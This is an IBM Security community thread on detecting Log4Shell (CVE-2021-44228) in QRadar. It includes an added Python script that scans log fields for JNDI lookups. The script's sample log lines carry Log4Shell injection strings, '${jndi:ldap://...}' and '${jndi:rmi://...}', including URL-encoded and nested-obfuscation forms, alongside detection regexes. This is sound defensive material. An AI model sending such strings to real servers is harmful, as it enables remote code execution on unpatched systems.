Hey Adam!
We have seen the exploit in virtually every logged string from servers. I assume it is due to the way it is being exploited. Hostname, URL, referrer, agent and query are all being seen with the exploit.
I hated to do it, but I made a BB with a "payload contains" test for jndi:, then added some logic for if the firewall allowed, then reset or dropped the connection.
------------------------------
Frank Eargle
------------------------------
Original Message:
Sent: Tue December 14, 2021 07:29 AM
From: Ariel Roitgarts
Subject: Detection of Log4Shell (CVE-2021-44228) using QRadar
Hi,
I believe there is a mistake in the examples of the building blocks in the blog post (the pictures).
You recommended matching the field "Username" against the regex in both examples, while I believe the correct field should be "User Agent" according to the latest exploit POC.
Please let me know if this is correct.
Thanks in advance,
Ariel
------------------------------
Ariel Roitgarts
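The two points raised above (Frank's: the lookup string shows up in the Hostname, URL, referrer, agent and query fields alike, so a "payload contains jndi:" building block is the pragmatic catch-all; Ariel's: the regex belongs on the User Agent field, not Username) can be checked offline against a handful of access-log lines. The Python below is an added example, not code from the thread, from Adam Frank's blog post, or from QRadar itself. It assumes a combined-log-style line with the request's Host header prepended (a constructed format), parses out the five fields the thread names, URL-decodes each one, collapses the well-known nested-lookup obfuscations (`${lower:j}`, `${upper:n}`, `${::-d}`, `${env:X:-j}`) and only then tests for `${jndi:`. The sample log lines are constructed; the IPs are RFC 5737 documentation addresses.

```python
import re
from urllib.parse import unquote

# Constructed sample log lines (not taken from the thread). Assumed format:
# <host header> <client ip> - - [<time>] "<method> <url> <proto>" <status> <bytes> "<referrer>" "<user agent>"
SAMPLE_LOG_LINES = [
    # benign request
    'www.example.com 198.51.100.10 - - [14/Dec/2021:07:29:00 +0000] "GET /index.html HTTP/1.1" 200 1043 "https://www.example.com/" "Mozilla/5.0"',
    # plain lookup string in the User-Agent (the field Ariel points at)
    'www.example.com 198.51.100.11 - - [14/Dec/2021:07:29:01 +0000] "GET /login HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.5:1389/a}"',
    # URL-encoded lookup string in the query string
    'www.example.com 198.51.100.12 - - [14/Dec/2021:07:29:02 +0000] "GET /search?q=%24%7Bjndi%3Aldap%3A%2F%2F203.0.113.5%2Fa%7D HTTP/1.1" 404 0 "-" "curl/7.79.1"',
    # nested-lookup obfuscation in the Referer: no literal "jndi:" anywhere in the line
    'www.example.com 198.51.100.13 - - [14/Dec/2021:07:29:03 +0000] "GET / HTTP/1.1" 200 1043 "${${lower:j}${upper:n}${::-d}i:ldap://203.0.113.5/a}" "Mozilla/5.0"',
    # lookup string placed in the Host header
    '${jndi:rmi://203.0.113.5:1099/a} 198.51.100.14 - - [14/Dec/2021:07:29:04 +0000] "GET / HTTP/1.1" 400 0 "-" "Mozilla/5.0"',
]

# Parser for the assumed log format; named groups map onto the fields the thread lists.
LOG_LINE = re.compile(
    r'^(?P<hostname>\S+) (?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<url>\S+) (?P<proto>[^"]*)" (?P<status>\d{3}) (?P<bytes>\S+) '
    r'"(?P<referrer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# Innermost Log4j lookups that attackers wrap around the letters of "jndi" to defeat
# a plain substring match. Each pattern rewrites one lookup to its resolved text.
LOOKUP_OBFUSCATIONS = [
    re.compile(r"\$\{(?:lower|upper):([^}$]*)\}", re.I),      # ${lower:j} -> j
    re.compile(r"\$\{(?!jndi)[^}$]*?:-([^}$]*)\}", re.I),     # ${::-d}, ${env:X:-j} -> d, j
]
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:", re.I)


def normalize(value: str, max_rounds: int = 10) -> str:
    """URL-decode (twice, for double encoding) and collapse nested lookups until stable."""
    text = unquote(unquote(value))
    for _ in range(max_rounds):
        resolved = text
        for pattern in LOOKUP_OBFUSCATIONS:
            resolved = pattern.sub(r"\1", resolved)
        if resolved == text:
            break
        text = resolved
    return text


def extract_fields(line: str):
    """Split one log line into the fields the thread names; None if the line does not parse."""
    match = LOG_LINE.match(line)
    if not match:
        return None
    path, _, query = match.group("url").partition("?")
    return {
        "hostname": match.group("hostname"),
        "url": path,
        "query": query,
        "referrer": match.group("referrer"),
        "agent": match.group("agent"),
    }


def scan_line(line: str):
    """Return (field, normalized value) for every field carrying a JNDI lookup."""
    fields = extract_fields(line)
    if fields is None:
        return []
    hits = []
    for name, raw in fields.items():
        normalized = normalize(raw)
        if JNDI_LOOKUP.search(normalized):
            hits.append((name, normalized))
    return hits


def scan_log(lines):
    """Return (line index, hits) for every line with at least one hit."""
    findings = []
    for index, line in enumerate(lines):
        hits = scan_line(line)
        if hits:
            findings.append((index, hits))
    return findings


if __name__ == "__main__":
    for index, hits in scan_log(SAMPLE_LOG_LINES):
        for field, value in hits:
            print(f"line {index}: field={field} value={value}")
```

The fourth sample line is the one worth keeping in mind when tuning a building block: the raw line never contains the substring `jndi:`, so a "payload contains jndi:" test is silent on it and only the normalized value matches. Scanning every extracted field rather than one chosen property is what lets the Host-header and query-string cases surface alongside the User-Agent case.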
Original Message:
Sent: Mon December 13, 2021 02:45 PM
From: Wendy Batten
Subject: Detection of Log4Shell (CVE-2021-44228) using QRadar
Updated blog by CTO Adam Frank: Detection of Log4Shell (CVE-2021-44228) using QRadar
------------------------------
Wendy Batten
Community Manager
IBM Security
Cambridge MA
wjbatten@us.ibm.com
------------------------------